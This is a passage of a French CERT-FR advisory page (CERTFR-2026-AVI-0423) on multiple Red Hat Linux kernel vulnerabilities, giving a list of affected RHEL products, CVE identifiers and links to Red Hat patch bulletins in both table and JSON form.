"description": "Version initiale",
"revision_date": "2026-03-13T00:00:00.000000"
}
],
"risks": [
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans le noyau Linux de Red Hat. Elles permettent \u00e0 un attaquant de provoquer une atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es, un contournement de la politique de s\u00e9curit\u00e9 et un probl\u00e8me de s\u00e9curit\u00e9 non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans le noyau Linux de Red Hat",
"vendor_advisories": [
{
"published_at": "2026-03-09",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:4111",
"url": "https://access.redhat.com/errata/RHSA-2026:4111"
},
{
"published_at": "2026-03-09",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:4011",
"url": "https://access.redhat.com/errata/RHSA-2026:4011"
},
{
"published_at": "2026-03-09",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:3966",
"url": "https://access.redhat.com/errata/RHSA-2026:3966"
},
{
"published_at": "2026-03-11",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:4245",
"url": "https://access.redhat.com/errata/RHSA-2026:4245"
},
{
"published_at": "2026-03-09",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:3963",
"url": "https://access.redhat.com/errata/RHSA-2026:3963"
},
{
"published_at": "2026-03-12",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:4444",
"url": "https://access.redhat.com/errata/RHSA-2026:4444"
},
{
"published_at": "2026-03-11",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:4246",
"url": "https://access.redhat.com/errata/RHSA-2026:4246"
},
{
"published_at": "2026-03-11",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:4242",
"url": "https://access.redhat.com/errata/RHSA-2026:4242"
},
{
"published_at": "2026-03-11",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:4243",
"url": "https://access.redhat.com/errata/RHSA-2026:4243"
},
{
"published_at": "2026-03-11",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:4244",
"url": "https://access.redhat.com/errata/RHSA-2026:4244"
},
{
"published_at": "2026-03-09",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:3964",
"url": "https://access.redhat.com/errata/RHSA-2026:3964"
}
]
}
CERTFR-2026-AVI-0423
Vulnerability from certfr_avis - Published: 2026-04-10 - Updated: 2026-04-10
De multiples vulnérabilités ont été découvertes dans le noyau Linux de Red Hat. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire, une élévation de privilèges et un déni de service à distance.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
None| Vendor | Product | Description | ||
|---|---|---|---|---|
| Red Hat | N/A | Red Hat Enterprise Linux for x86_64 10 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for Power, little endian - Extended Update Support 9.6 ppc64le | ||
| Red Hat | N/A | Red Hat Enterprise Linux for x86_64 9 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for Power, little endian - Extended Life Cycle 9.2 ppc64le | ||
| Red Hat | N/A | Red Hat Enterprise Linux for Power, little endian 9 ppc64le | ||
| Red Hat | N/A | Red Hat Enterprise Linux for x86_64 - Extended Update Support Extension 8.8 x86_64 | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for ARM 64 10 aarch64 | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for x86_64 - Extended Update Support 10.0 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for Power, little endian 10 ppc64le | ||
| Red Hat | N/A | Red Hat Enterprise Linux for Power, little endian - Extended Update Support 10.0 ppc64le | ||
| Red Hat | N/A | Red Hat Enterprise Linux for IBM z Systems - Extended Life Cycle 9.2 s390x | ||
| Red Hat | N/A | Red Hat Enterprise Linux for x86_64 - 4 years of updates 10.0 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for x86_64 - Extended Life Cycle 9.6 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for ARM 64 - Extended Life Cycle 9.6 aarch64 | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for IBM z Systems 10 s390x | ||
| Red Hat | N/A | Red Hat Enterprise Linux Server - AUS 9.6 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for Power, little endian - 4 years of support 10.0 ppc64le | ||
| Red Hat | N/A | Red Hat Enterprise Linux for ARM 64 - Extended Life Cycle 9.2 aarch64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for x86_64 - Extended Update Support 9.6 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux Server - AUS 8.6 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 10.0 s390x | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for ARM 64 - Extended Update Support 9.6 aarch64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 9.2 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for ARM 64 - Extended Update Support 10.0 aarch64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for Power, little endian 8 ppc64le | ||
| Red Hat | N/A | Red Hat Enterprise Linux for IBM z Systems 8 s390x | ||
| Red Hat | N/A | Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.6 ppc64le | ||
| Red Hat | N/A | Red Hat Enterprise Linux Server - TUS 8.6 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 9.6 s390x | ||
| Red Hat | N/A | Red Hat Enterprise Linux Server - TUS 8.8 x86_64 | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for x86_64 - Extended Update Support 9.6 x86_64 | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for IBM z Systems - Extended Update Support 10.0 s390x | ||
| Red Hat | N/A | Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 8.6 x86_64 | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for ARM 64 8 aarch64 | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for x86_64 8 x86_64 | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for Power, little endian - Extended Update Support 10.0 ppc64le | ||
| Red Hat | N/A | Red Hat Enterprise Linux for ARM 64 9 aarch64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for ARM 64 - Extended Update Support 9.6 aarch64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.2 ppc64le | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for x86_64 10 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.6 ppc64le | ||
| Red Hat | N/A | Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 8.8 x86_64 | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for Power, little endian 10 ppc64le | ||
| Red Hat | N/A | Red Hat Enterprise Linux Server - AUS 8.4 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for Power, little endian - Extended Life Cycle 8.10 ppc64le | ||
| Red Hat | N/A | Red Hat Enterprise Linux for Real Time for NFV 8 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for x86_64 - Extended Update Support Extension 8.4 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 9.6 s390x | ||
| Red Hat | N/A | Red Hat Enterprise Linux Server - AUS 9.2 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 9.0 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for ARM 64 8 aarch64 | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for Power, little endian - Extended Update Support 9.6 ppc64le | ||
| Red Hat | N/A | Red Hat Enterprise Linux for IBM z Systems - Extended Life Cycle 9.6 s390x | ||
| Red Hat | N/A | Red Hat Enterprise Linux for ARM 64 - 4 years of updates 9.2 aarch64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for IBM z Systems - Extended Life Cycle 8.10 s390x | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for Power, little endian 9 ppc64le | ||
| Red Hat | N/A | Red Hat Enterprise Linux for ARM 64 - 4 years of updates 9.6 aarch64 | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for IBM z Systems - Extended Update Support 9.6 s390x | ||
| Red Hat | N/A | Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 10.0 s390x | ||
| Red Hat | N/A | Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.8 ppc64le | ||
| Red Hat | N/A | Red Hat Enterprise Linux for IBM z Systems 9 s390x | ||
| Red Hat | N/A | Red Hat Enterprise Linux for ARM 64 - Extended Life Cycle 8.10 aarch64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for ARM 64 - 4 years of updates 10.0 aarch64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux Server - AUS 8.2 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for x86_64 8 x86_64 | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for x86_64 9 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for Real Time 8 x86_64 | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for Power, little endian 8 ppc64le | ||
| Red Hat | N/A | Red Hat Enterprise Linux for Power, little endian - Extended Life Cycle 9.6 ppc64le | ||
| Red Hat | N/A | Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 9.6 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for x86_64 - Extended Life Cycle 9.2 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for ARM 64 10 aarch64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 9.2 s390x | ||
| Red Hat | N/A | Red Hat Enterprise Linux for IBM z Systems 10 s390x | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for ARM 64 - Extended Update Support 10.0 aarch64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for x86_64 - Extended Update Support Extension 8.6 x86_64 | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for ARM 64 9 aarch64 | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for IBM z Systems 9 s390x | ||
| Red Hat | N/A | Red Hat Enterprise Linux for x86_64 - Extended Update Support 10.0 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for x86_64 - Extended Life Cycle 8.10 x86_64 |
| Title | Publication Time | Tags | |||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Red Hat Enterprise Linux for x86_64 10 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Power, little endian - Extended Update Support 9.6 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 9 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Power, little endian - Extended Life Cycle 9.2 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Power, little endian 9 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Extended Update Support Extension 8.8 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for ARM 64 10 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for x86_64 - Extended Update Support 10.0 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Power, little endian 10 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Power, little endian - Extended Update Support 10.0 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems - Extended Life Cycle 9.2 s390x",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - 4 years of updates 10.0 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Extended Life Cycle 9.6 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 - Extended Life Cycle 9.6 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for IBM z Systems 10 s390x",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - AUS 9.6 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Power, little endian - 4 years of support 10.0 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 - Extended Life Cycle 9.2 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Extended Update Support 9.6 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - AUS 8.6 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 10.0 s390x",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for ARM 64 - Extended Update Support 9.6 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 9.2 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 - Extended Update Support 10.0 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Power, little endian 8 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems 8 s390x",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.6 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - TUS 8.6 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 9.6 s390x",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - TUS 8.8 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for x86_64 - Extended Update Support 9.6 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for IBM z Systems - Extended Update Support 10.0 s390x",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 8.6 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for ARM 64 8 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for x86_64 8 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for Power, little endian - Extended Update Support 10.0 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 9 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 - Extended Update Support 9.6 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.2 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for x86_64 10 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.6 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 8.8 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for Power, little endian 10 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - AUS 8.4 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Power, little endian - Extended Life Cycle 8.10 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Real Time for NFV 8 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Extended Update Support Extension 8.4 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 9.6 s390x",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - AUS 9.2 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 9.0 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 8 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for Power, little endian - Extended Update Support 9.6 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems - Extended Life Cycle 9.6 s390x",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 - 4 years of updates 9.2 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems - Extended Life Cycle 8.10 s390x",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for Power, little endian 9 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 - 4 years of updates 9.6 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for IBM z Systems - Extended Update Support 9.6 s390x",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 10.0 s390x",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.8 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems 9 s390x",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 - Extended Life Cycle 8.10 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 - 4 years of updates 10.0 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - AUS 8.2 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 8 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for x86_64 9 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Real Time 8 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for Power, little endian 8 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Power, little endian - Extended Life Cycle 9.6 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 9.6 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Extended Life Cycle 9.2 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 10 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 9.2 s390x",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems 10 s390x",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for ARM 64 - Extended Update Support 10.0 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Extended Update Support Extension 8.6 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for ARM 64 9 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for IBM z Systems 9 s390x",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Extended Update Support 10.0 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Extended Life Cycle 8.10 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-40064",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40064"
},
{
"name": "CVE-2024-26984",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26984"
},
{
"name": "CVE-2025-38109",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38109"
},
{
"name": "CVE-2025-40240",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40240"
},
{
"name": "CVE-2026-23210",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23210"
},
{
"name": "CVE-2025-71085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71085"
},
{
"name": "CVE-2026-23209",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23209"
},
{
"name": "CVE-2026-23204",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23204"
},
{
"name": "CVE-2026-23191",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23191"
},
{
"name": "CVE-2021-4460",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-4460"
},
{
"name": "CVE-2025-38206",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38206"
},
{
"name": "CVE-2026-23001",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23001"
},
{
"name": "CVE-2026-23193",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23193"
},
{
"name": "CVE-2025-40168",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40168"
},
{
"name": "CVE-2026-23144",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23144"
},
{
"name": "CVE-2025-68811",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68811"
},
{
"name": "CVE-2022-49674",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49674"
},
{
"name": "CVE-2025-38154",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38154"
},
{
"name": "CVE-2026-23171",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23171"
},
{
"name": "CVE-2025-38180",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38180"
},
{
"name": "CVE-2026-23111",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23111"
},
{
"name": "CVE-2026-23231",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23231"
},
{
"name": "CVE-2025-71238",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71238"
},
{
"name": "CVE-2025-38248",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38248"
}
],
"initial_release_date": "2026-04-10T00:00:00",
"last_revision_date": "2026-04-10T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0423",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-04-10T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Ex\u00e9cution de code arbitraire"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans le noyau Linux de Red Hat. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire, une \u00e9l\u00e9vation de privil\u00e8ges et un d\u00e9ni de service \u00e0 distance.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans le noyau Linux de Red Hat",
"vendor_advisories": [
{
"published_at": "2026-04-08",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:6954",
"url": "https://access.redhat.com/errata/RHSA-2026:6954"
},
{
"published_at": "2026-04-06",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:6632",
"url": "https://access.redhat.com/errata/RHSA-2026:6632"
},
{
"published_at": "2026-04-07",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:6940",
"url": "https://access.redhat.com/errata/RHSA-2026:6940"
},
{
"published_at": "2026-04-06",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:6571",
"url": "https://access.redhat.com/errata/RHSA-2026:6571"
},
{
"published_at": "2026-04-06",
